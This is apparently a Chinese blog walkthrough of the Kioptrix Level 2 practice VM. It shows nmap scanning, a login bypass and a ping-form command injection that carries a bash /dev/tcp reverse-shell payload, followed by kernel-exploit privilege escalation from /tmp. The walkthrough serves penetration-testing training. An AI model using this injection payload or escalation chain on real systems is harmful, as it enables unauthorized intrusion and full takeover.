首页 > 其他分享 >OSCP靶机训练Kioptrix Level 2

OSCP靶机训练Kioptrix Level 2

时间:2024-05-13 11:12:22浏览次数:14  
标签:Kioptrix 10.0 Level kali web 靶机 OSCP

Vulnhub——Kioptrix Level 2

前期准备:

  1. kali攻击机:10.0.0.4
  2. 靶机:10.0.0.11
  3. 网络适配器全部设置为NAT模式
  4. 靶机需要去配置文件中将所有Bridge改为nat

渗透过程

第一步:主机存活探测

arp-scan -l

image-20240205104712627

第二步:端口扫描

nmap --min-rate 10000 -p- 10.0.0.11

image-20240205104802635

第三步:基本信息扫描

nmap -sT -sC -sV -O -p22,80,111,443,631,936,3306 10.0.0.11

image-20240205104920631

第四步:web渗透

  • 访问web站点

image-20240205105012501

  • 发现需要登录,尝试弱口令以及万能密码进行登录成功

image-20240205105127567

  • 很典型的一个漏洞点,在kali中进行监听

image-20240205105203223

  • 在网页中输入ping 10.0.04; bash -i >& /dev/tcp/10.0.0.4/1234 0>1&

image-20240205105331439

  • 获得普通用户权限

image-20240205105443854

  • 然后就是进行提权,这里我用的内核提权

  • 根据第三步可以知道靶机的系统版本

image-20240205105601016

  • 在kali中搜索该版本系统存在的exp

image-20240205105714230

  • 在kali中建立web服务,然后在靶机中下载exp

image-20240205105801148

image-20240205105837684

  • ····不允许····意料之中了,应该需要找一个允许的文件夹,一般这种情况大多数都会选择/tmp文件夹,去尝试一下

image-20240205110038698

  • 成功了,编译运行一下

image-20240205110131462

标签:Kioptrix,10.0,Level,kali,web,靶机,OSCP
From: https://www.cnblogs.com/LeouMaster/p/18188805

相关文章

  • OSCP靶机训练Kitoptrix Level 3
    Vulnhub——KioptrixVM3前期准备:kali攻击机:10.0.0.4靶机:10.0.0.12将两台机器都设置为NAT模式渗透过程:第一步:存活主机探测arp-scan-l第二步:端口扫描nmap--min-rate10000-p-10.0.0.12第三步:基本信息扫描nmap-sT-sC-sV-O-p22,8010.0.0.12第四步:WEB渗......
  • OSCP靶机训练Kioptrix Level 4
    Vulnhub——KioptrixLevel4前期准备:kali攻击机:10.10.10.12靶机:10.10.10.15将两台机器都设置为NAT模式渗透过程1、首先是存活主机探测,确认目标是否在线arp-scan-l2、然后对目标进行端口扫描, 确认目标开放了哪些端口以及服务3、开放了4个端口,首先目光集中在80端......
  • OSCP靶机训练Kioptrix Level 1
    Vulnhub——KioptrixLevel1前期准备:​ 1、kali攻击机:10.0.0.4 NAT模式​ 2、靶机:10.0.0.10 NAT模式​ 注意:​ 该靶机默认为桥接模式,且在虚拟机中修改为NAT模式,在靶机启动之后又自动更改为了桥接模式​ 需要在靶机的配置文件中进行修改​ 将所有Bridge修改为nat即可......
  • 【HEVC简介】High Level Syntax
    NAL      NAL:NetworkAbstractLayer,网络抽象层,编码后的bitstream就是由一个个NAL组成。NAL由一个2Bytes的NALheader和NALpayloaddata两部分组成。NAL分为VCL(videocodinglayer)NAL和non-VCLNAL两类,其中VCLNAL包含一个picture的数据,而non-VCLNAL包含与多个pic......
  • vite打包,pdfjs-dist 报错import引入pdfjs-dist报错Top-level await is not available
    Top-levelawaitisnotavailableintheconfiguredtargetenvironment("chrome87","edge88","es2020","firefox78","safari14"+2overrides)node_modules/pdfjs-dist/build/pdf.mjs:17349:53:17349│/****......
  • WPF relativesource,self,FindAncestor,AncestorType,AncestorLevel,PreviousData,Tem
    <Windowx:Class="WpfApp68.MainWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.microsoft.com......
  • 内核config文件打开CONFIG_DEVMEM后出现For kernel requirements at matrix level 5,
    内核config文件打开CONFIG_DEVMEM后出现编译错误:checkvintfI04-1823:30:02409602409602check_vintf.cpp:84]List'out/target/product/sc126/system/product/etc/vintf/':NosuchfileordirectorycheckvintfI04-1823:30:02409602409602check_vintf.cpp:84]L......
  • 攻防世界 Level0 PWN
    查壳[*]'\level'Arch:amd64-64-littleRELRO:NoRELROStack:NocanaryfoundNX:NXenabledPIE:NoPIE(0x400000)ida//mainint__cdeclmain(intargc,constchar**argv,constchar**envp){writ......
  • Oracle 在谈 connect by level
     在开发的过程中遇到需要把一行数据显示成N行,当时马上就想到了connectbylevel 这个实在太好用了显示一行selectlevelrnfromdualconnectbylevel<2;显示二行selectlevelrnfromdualconnectbylevel<3; 实例:目前显示一行selectpha.segment1,......
  • Oracle 根据一行数据的某个字段内容拆行(connect by level)
     今天有个同事问我能不能根据行的指定字段内容进行拆行,例如该行字段内容:2C18E570;2C18DE70根据分号拆出两行 一眼望穿,非常简单毕竟从事Oracle已经10多年了,比这个更变态的需求都遇到过,归根还得要对Connectbylevel 运用非常熟悉 selecteco_number,ass......